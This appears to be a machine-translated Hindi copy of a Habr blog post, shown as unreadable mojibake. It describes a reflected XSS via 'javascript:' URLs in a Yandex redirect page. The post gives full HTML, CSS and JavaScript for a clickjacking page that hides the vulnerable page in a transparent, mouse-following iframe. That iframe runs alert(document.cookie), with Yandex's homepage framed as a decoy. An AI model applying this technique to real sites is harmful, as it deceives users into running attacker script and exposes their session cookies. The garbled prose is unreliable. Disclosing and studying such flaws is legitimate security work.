Geekly Articles each Day

рд╣рдо YSSex (рдирд┐рд╢реНрдЪрд┐рдд) рдкрд░ XSS рд╕реНрдкрд┐рди рдХрд░рддреЗ рд╣реИрдВ



рд╣реИрд▓реЛ, рд╣реЙрдХрд░реНрд╕!

рдЖрдЬ рдореИрдВ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдЪрд▓рд╛, рд░рд╛рдЬрдзрд╛рдиреА рдореЗрдВ рдореМрд╕рдо рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдпреИрдВрдбреЗрдХреНрд╕ рдЧрдпрд╛ред рдЬрдм рдореИрдВрдиреЗ "рджреВрд╕рд░реЗ рд╢рд╣рд░" рдмрдЯрди рдкрд░ рдХреНрд▓рд┐рдХ рдХрд┐рдпрд╛, рддреЛ рдпреИрдВрдбреЗрдХреНрд╕ рдиреЗ рдореБрдЭреЗ рдпрд╣рд╛рдВ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд┐рдпрд╛ред рдореБрдЭреЗ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рд╣рд░ рдХреЛрдИ рдЬреЛ рдЗрд╕ рддрд░рд╣ рдХреЗ рдкрддреЗ рдХреЛ рджреЗрдЦрддрд╛ рд╣реИ, рдЙрд╕рдХреЗ рдорд╛рдкрджрдВрдбреЛрдВ рдореЗрдВ рд╕реЗ рдХрд┐рд╕реА рдПрдХ рдХреЛ рдмрджрд▓рдиреЗ рдХреА рдЗрдЪреНрдЫрд╛ рд╣реЛрддреА рд╣реИ, рдпрд╛ рдлрд┐рд░ рдкреНрд░рддрд┐рд╢реЛрдз рдХреАред :) рдореИрдВ рдПрдХ рдорд╛рдирдХ рдореЗрдВ рдбрд╛рд▓ рджрд┐рдпрд╛
"><script>alert('xss');</script>
рдФрд░ рд╕реНрд░реЛрдд рдореЗрдВ рдЪрдврд╝ рдЧрдП, рджреЗрдЦреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ рдХреНрдпрд╛ рдирд╣реАрдВ рд╣реИред рдпрд╣рд╛рдБ рд╕реНрд░реЛрдд рдореЗрдВ рдПрдХ рдкрдВрдХреНрддрд┐ рд╣реИред
 <span onclick="return {'b\-form\-button':{name:'b\-form\-button', 'retpath': &quot;\&quot;&gt;&lt;script&gt;alert('xss')&quot;}}"
рдЦреИрд░, рдореБрдЭреЗ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдмреЛрд░рд┐рдпрдд - рд╕рдм рдХреБрдЫ рдлрд╝рд┐рд▓реНрдЯрд░реНрдб рд╣реИред рддрдм рдЙрдиреНрд╣реЛрдВрдиреЗ рдФрд░ рдЕрдзрд┐рдХ рдмрд╛рд░реАрдХреА рд╕реЗ рджреЗрдЦрд╛ рдФрд░ рдорд╣рд╕реВрд╕ рдХрд┐рдпрд╛ рдХрд┐ рдпреИрдВрдбреЗрдХреНрд╕ рд╢реБрд░реБрдЖрдд рдореЗрдВ рдпреВрдЖрд░рдПрд▓ рдореЗрдВ рдПрдХ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдирд╣реАрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реИ, рдФрд░ рдпрд╣рд╛рдВ рдЖрдк рдЪрд╛рд░реЛрдВ рдУрд░ рдЦреЗрд▓ рд╕рдХрддреЗ рд╣реИрдВред рд╢реБрд░реВ рдХреА
 javascript: alert('xss');
- рдпрд╣ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ! рд▓реЗрдХрд┐рди рджреБрд░реНрднрд╛рдЧреНрдп рд╕реЗ, рдХреЗрд╡рд▓ рдЬрдм рдЖрдк "рд░рд┐рдЯрд░реНрди" рдмрдЯрди рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░рддреЗ рд╣реИрдВред рдЖрдк рдЗрд╕реЗ рдЖрдЬрдорд╛ рд╕рдХрддреЗ рд╣реИрдВ ред рдкрд╣рд▓реЗ рд╕реЗ рдЕрдзрд┐рдХ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ, рд╣рдо рдЖрдЧреЗ рдЦреБрджрд╛рдИ рдХрд░рддреЗ рд╣реИрдВ ...



(рд╢реИрдХреНрд╖рд┐рдХ рдЙрджреНрджреЗрд╢реНрдпреЛрдВ рдХреЗ рд▓рд┐рдП рд▓рд┐рдЦрд┐рдд рдФрд░ рдкреНрд░рджрддреНрдд рд╕рд╛рдордЧреНрд░реАред)

рддреЛ, рдХреНрдпрд╛ рдХрд░рдиреЗ рдХреА рдЬрд░реВрд░рдд рд╣реИ рддрд╛рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдкрддрд╛ рди рдЪрд▓реЗ рдХрд┐ рд╡рд╣ "рд░рд┐рдЯрд░реНрди" рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░ рд░рд╣рд╛ рд╣реИ? - рдареАрдХ рд╣реИред рд╣рдореЗрдВ рдЗрд╕ рдкреГрд╖реНрда рдХреЛ рдПрдХ iframe рдореЗрдВ рд░рдЦрдирд╛ рд╣реИ, рд╢реИрд▓рд┐рдпреЛрдВ рдХреЛ рдЬреЛрдбрд╝рдирд╛ рд╣реИ, рдФрд░ рдЗрд╕реЗ рдкрд╛рд░рджрд░реНрд╢реА рд░реВрдк рд╕реЗ рд╣рдорд╛рд░реЗ рдкреГрд╖реНрда рдкрд░ рдХрд┐рд╕реА рднреА рддрддреНрд╡ рдкрд░ рд░рдЦрдирд╛ рд╣реИред рд╣рдо рдлреНрд░реЗрдо рдХреЗ рд╕рд╛рде рд╡рд┐рдХрд▓реНрдк рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рддреЗ рд╣реИрдВ - рдпрд╣ рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред рдпреИрдВрдбреЗрдХреНрд╕ рдпрд╣ рдЬрд╛рдВрдЪрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рдЙрдирдХреА рд╕рд╛рдЗрдЯ рдПрдХ рдлреНрд░реЗрдо рдореЗрдВ рдЦреБрд▓реА рд╣реИ, рдФрд░ рдореВрд▓ рд╡рд┐рдВрдбреЛ (рдмреНрд░рд╛рдЙрдЬрд╝рд░) рдХреЛ рдпреИрдВрдбреЗрдХреНрд╕ рдкрд░ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд░рддрд╛ рд╣реИред рдЗрд╕ рд╕рдорд╕реНрдпрд╛ рдХреЛ рдХреИрд╕реЗ рд╣рд▓ рдХрд░реЗрдВ? рдореБрдЭреЗ iframe рдХреЗ рд▓рд┐рдП рд╕реИрдВрдбрдмреЙрдХреНрд╕ рд╡рд┐рд╢реЗрд╖рддрд╛ рдорд┐рд▓реА, рдХреЗрд╡рд▓ html5 рдореЗрдВ рдкреЗрд╢ рдХрд┐рдпрд╛ рдЧрдпрд╛ред рдФрд░ рд╡рд╣ рдХреЗрд╡рд▓ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд░рдиреЗ рд╕реЗ рдордирд╛ рдХрд░рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рд╡рд┐рдзрд┐ рдХреЗрд╡рд▓ рдХреНрд░реЛрдо рдореЗрдВ рдХрд╛рдо рдХрд░рддреА рд╣реИ, рдФрд░ рдлрд┐рд░, рдкреВрд░реЗ рдлреНрд░реЗрдо рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдЕрд╡рд░реБрджреНрдз рдХрд░рддреА рд╣реИред

рдореВрдб рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдмрд┐рдЧрдбрд╝рдиреЗ рд▓рдЧрд╛ рдерд╛, рдФрд░ рдореИрдВрдиреЗ рдпрд╣ рджреЗрдЦрдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ рдХрд┐ рдЕрдиреНрдп рдЬрдЧрд╣реЛрдВ рдкрд░ рдХрд╣рд╛рдБ рд░реЗрдЯрдкрд╛рде рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЕрдЧрд░ рдЗрд╕ рддрд░рд╣ рдХреА рднреЗрджреНрдпрддрд╛ рдПрдХ рдЬрдЧрд╣ рдкрд░ рд╣реИ, рддреЛ рдпрд╣ рджреВрд╕рд░реЗ рд╕реНрдерд╛рди рдкрд░ рд╣реЛрдЧреАред рдореБрдЭреЗ рдбреЙрдХреНрд╕ рдПрдВрдб рд╣реЗрд▓реНрдк рдореЗрдВ рдПрдХ рдпреБрдЧрд▓ рдорд┐рд▓рд╛, рд▓реЗрдХрд┐рди рдмреИрдХ рдмрдЯрди рдирд╣реАрдВ рдерд╛ред рдлрд┐рд░, рдЗрд╕ рддрдереНрдп рдХреЗ рдХрд╛рд░рдг рдХрд┐ рдореИрдВрдиреЗ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЛ рд╕рд╣реА рдврдВрдЧ рд╕реЗ рдирд╣реАрдВ рдмрджрд▓рд╛, рдпрд╛рдВрдбреЗрдХреНрд╕ рдиреЗ рдореБрдЭреЗ рдпрд╣рд╛рдВ рднреЗрдЬрд╛, рдФрд░ рдпрд╣рд╛рдВ рдпрд╣ рд╕рдм рд╢реБрд░реВ рд╣реБрдЖред

рдЗрд╕рд▓рд┐рдП, рд╣рдо url рдкреИрд░рд╛рдореАрдЯрд░ рдХреЛ рдмрджрд▓рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░рддреЗ рд╣реИрдВ
 javascript:alert('ahoy!');
рдФрд░ рд▓рд┐рдВрдХ рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░реЗрдВред рдпрд╣ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ! рдЕрдм рд╣рдо рдЖрдИрдлреНрд░реЗрдо рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдХреЗ рд╕рд╛рде рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВред рд╣реБрд░реНрд░реЗ! рдХреЛрдИ рдЬрд╛рдБрдЪ рдирд╣реАрдВ рд╣реИред рдкреНрд░рдпрд╛рд╕ рдХрд░рдирд╛ ред рдорд╣рд╛рди, рдЖрдЧреЗ рдмрдврд╝реЗрдВред

рдЕрдм рд╣рдореЗрдВ iframe рдореЗрдВ рдЖрд╡рд╢реНрдпрдХ рд╢реИрд▓рд┐рдпреЛрдВ рдХреЛ рдЬреЛрдбрд╝рдирд╛ рд╣реЛрдЧрд╛ред рдореИрдВрдиреЗ рдРрд╕рд╛ рдХрд░рдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛: рдПрдХ рдЫреЛрдЯреЗ (100x20) рджрд┐рд╡рд╛ рдХреЗ рдЕрдВрджрд░ рднреЗрджреНрдпрддрд╛ рдХреЗ рд╕рд╛рде рдЖрдИрдлреНрд░реЗрдо рдбрд╛рд▓ рджрд┐рдпрд╛, рдФрд░ рдЖрдИрдлреНрд░реЗрдо рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░ рджрд┐рдпрд╛ рддрд╛рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗрд╡рд▓ рд▓рд┐рдВрдХ рджреЗрдЦреЗрдЧрд╛ (рдЬрд┐рд╕реЗ рдЖрдкрдХреЛ рдХреНрд▓рд┐рдХ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ :)ред

 <!DOCTYPE html> <html> <head> <style type="text/css"> body { margin:0; padding:0; } #helper { position: absolute; overflow: hidden; width: 200px; height: 13px; } #ifr { position: relative; top: -180px; left: -58px; } </style> </head> <body> <div id="helper"> <div style="width: 100%; height: 300px"> <iframe id="ifr" src="http://yandex.ru/redir_warning/?url=javascript:alert(document.cookie)" width="1000px" height="300" frameborder="no" scrolling="no" ></iframe> </div> </div> </body> </html>


рд╣реЛ рдЧрдпрд╛, рд▓реЗрдХрд┐рди рдХрд┐рд╕реА рддрд░рд╣ рдЙрдмрд╛рдК! рдореИрдВ рдЪрд╛рд╣реВрдВрдЧрд╛ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреБрдЫ рднреА рд╕рдВрджреЗрд╣ рди рдХрд░реЗрдВред рдпрд╣ рдХреИрд╕реЗ рдХрд░рдирд╛ рд╣реИ? рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рд╕рд╡рд╛рд▓ред рдкрд╣рд▓реА рдмрд╛рдд рдЬреЛ рджрд┐рдорд╛рдЧ рдореЗрдВ рдЖрдИ рд╡рд╣ рдпрд╣ рдереА рдХрд┐ рдпрджрд┐ рдЖрдк рдорд╛рдЙрд╕ рдХреЗ рдкреАрдЫреЗ рд╕рд╣рд╛рдпрдХ рддрддреНрд╡ рдХреЛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░рддреЗ рд╣реИрдВред рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЕрдм рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рд╕реНрдерд╛рди рдкрд░ рдХреНрд▓рд┐рдХ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рд╡рд╣ рдЬрд╣рд╛рдВ рднреА рдХреНрд▓рд┐рдХ рдХрд░реЗрдЧрд╛, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдЧрд╛ред рдореИрдВ рдХреЛрдб рд▓рд╛рддрд╛ рд╣реВрдВ:
  var el; window.onload = function() { var ifr = document.getElementById("ifr"); //      if(navigator.userAgent.toLowerCase().indexOf("webkit") != -1) { ifr.style.top = "-180px"; } else { ifr.style.top = "-190px"; } el = document.getElementById("helper"); window.onmousemove = onmove; } function onmove(e) { el.style.left = (e.pageX - 50) + "px"; el.style.top = (e.pageY - 12) + "px"; return false; }

рдФрд░ рд╣рдо рдореБрдЦреНрдп рдпреИрдВрдбреЗрдХреНрд╕ рд╕реЗ рдПрдХ рдмрдбрд╝рд╛ рдФрд░ рджреГрд╢реНрдпрдорд╛рди рдИ-рдореЗрд▓ рдЦреЛрд▓рддреЗ рд╣реИрдВ, рддрд╛рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд▓рдЧреЗ рдХрд┐ рд╡рд╣ рдЕрднреА рднреА рд╡рд╣реАрдВ рд╣реИред :)
 <iframe id="yandex" src="http://yandex.ru/" width="100%" height="100%" frameborder="no"></iframe>

рдЕрдЪреНрдЫрд╛ рд╣реИ! рдпрд╛рдВрдбреЗрдХреНрд╕ рдЖрдкрдХреЛ рдлреНрд░реЗрдо рдХреЗ рдЕрдВрджрд░ рдЕрдкрдирд╛ рдЧреНрд▓реЗрди рдкреЗрдЬ рдЦреЛрд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

рд╣рдо рддрддреНрд╡реЛрдВ рдХреЗ zIndex рдХреЛ рдмрджрд▓рддреЗ рд╣реИрдВ рдФрд░ рд╣рдорд╛рд░реЗ рд╕рд╣рд╛рдпрдХ рдХреЛ рдЕрджреГрд╢реНрдп рдмрдирд╛рддреЗ рд╣реИрдВ рдФрд░ рдПрдХ рдЕрддрд┐рд░рд┐рдХреНрдд рдкрд╛рд░рджрд░реНрд╢реА DIV рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ рдЬреЛ рдпрд╛рдВрдбреЗрдХреНрд╕ рдлреНрд░реЗрдо рдХреЛ рдУрд╡рд░рд▓реИрдк рдХрд░рддрд╛ рд╣реИ рдФрд░ рдлреНрд░реЗрдо рдХреЗ рдмреАрдЪ рд╕рдВрдШрд░реНрд╖ рд╕реЗ рдмрдЪрддрд╛ рд╣реИред

  <div id="overlay"></div> 

 #helper { z-index: 20000; opacity: 0; } #yandex { z-index: 10; } #overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 20; }


рддреИрдпрд╛рд░ рдЙрджрд╛рд╣рд░рдгред
рдпрд╣ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ?

(рд▓рд┐рдВрдХ рд╕рддрд░реНрдХрддрд╛ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВ (document.cookie))

рдореБрдЭреЗ рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдЖрдкрдХреЛ рдореЗрд░рд╛ рд▓реЗрдЦ рдкрд╕рдВрдж рдЖрдпрд╛ рд╣реЛрдЧрд╛ред рдореБрдЭреЗ рдЯрд┐рдкреНрдкрдгреА рдХрд░рдиреЗ рдореЗрдВ рдЦреБрд╢реА рд╣реЛрдЧреАред

20:30 рдХреЗ рд╕рдордп, рднреЗрджреНрдпрддрд╛ рдХреЛ рдХрд╡рд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдореИрдВ рдпреИрдВрдбреЗрдХреНрд╕ рдХреЗ рд▓рд┐рдП рдмрд╣реБрдд рдЦреБрд╢ рд╣реВрдВ рдХрд┐ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХреА рдЧрддрд┐ рдЗрддрдиреА рддреЗрдЬ рд╣реИред рдпрд╛рдВрдбреЗрдХреНрд╕ рд╕реЗ рдореЗрд▓ рдЖрдпрд╛:

  , !          ,      .    . --  , ...    http://help.yandex.ru/

Source: https://habr.com/ru/post/In126800/

More articles:


All Articles